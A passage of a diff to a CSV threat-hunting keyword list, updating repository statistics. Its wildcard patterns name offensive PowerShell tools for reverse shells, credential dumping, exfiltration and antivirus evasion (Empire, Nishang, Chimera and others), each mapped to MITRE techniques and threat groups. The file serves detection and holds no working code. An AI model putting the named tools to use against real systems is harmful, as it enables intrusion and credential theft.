Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1142","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Portscan.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1081","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-PoshRatHttp*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*Invoke-PoshRatHttp*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-PoshRatHttps*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-PostExfil*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PostExfil.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-PostExfil*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1142","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-PowerDump*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" -"*Invoke-PowerDump*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-PowerDump*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1057","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-PowerDump*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-PowerDump*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-PowerDump*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1057","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-PowerDump*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*Invoke-PowerExtract*","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. 
It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","1","99","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z" -"*Invoke-PowerShellHistoryCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-PowerShellIcmp*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Invoke-PowerShellIcmp.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*Invoke-PowerShellHistoryCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-PowerShellIcmp*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security 
penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-PowerShellIcmp.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*Invoke-PowerShellTcp*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-PowerShellTcp*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-PowerShellTcp*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" "*Invoke-PowerShellTcp.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-PowerShellTcp.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" -"*Invoke-PowerShellTcpOneLine*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Invoke-PowerShellTcpOneLine.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" -"*Invoke-PowerShellTcpOneLineBind*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Invoke-PowershellTranscriptionCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-PowerShellUdp*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Invoke-PowerShellUdp.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" -"*Invoke-PowerShellUdpOneLine*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Invoke-PowerShellUdpOneLine.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" -"*Invoke-PowerShellWmi*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-PowerShellTcp.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*Invoke-PowerShellTcpOneLine*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-PowerShellTcpOneLine.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*Invoke-PowerShellTcpOneLineBind*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-PowershellTranscriptionCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-PowerShellUdp*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-PowerShellUdp.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*Invoke-PowerShellUdpOneLine*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-PowerShellUdpOneLine.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*Invoke-PowerShellWmi*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" "*Invoke-PowerThIEf*","offensive_tool_keyword","Invoke-PowerThIEf","An IE Post Exploitation Library released at Steelcon in Sheffield 7th July 2018.","T1027 - T1053 - T1114 - T1059 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/nettitude/Invoke-PowerThIEf","1","0","N/A","N/A","2","127","27","2018-09-12T11:26:06Z","2018-07-10T09:14:58Z" -"*Invoke-PPLDump*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-Prasadhak*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for 
offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-PPLDump*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Prasadhak*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" "*Invoke-PrintDemon*","offensive_tool_keyword","Invoke-PrintDemon","This is an PowerShell Empire launcher PoC using PrintDemon and Faxhell. The module has the Faxhell DLL already embedded which leverages CVE-2020-1048 for privilege escalation. 
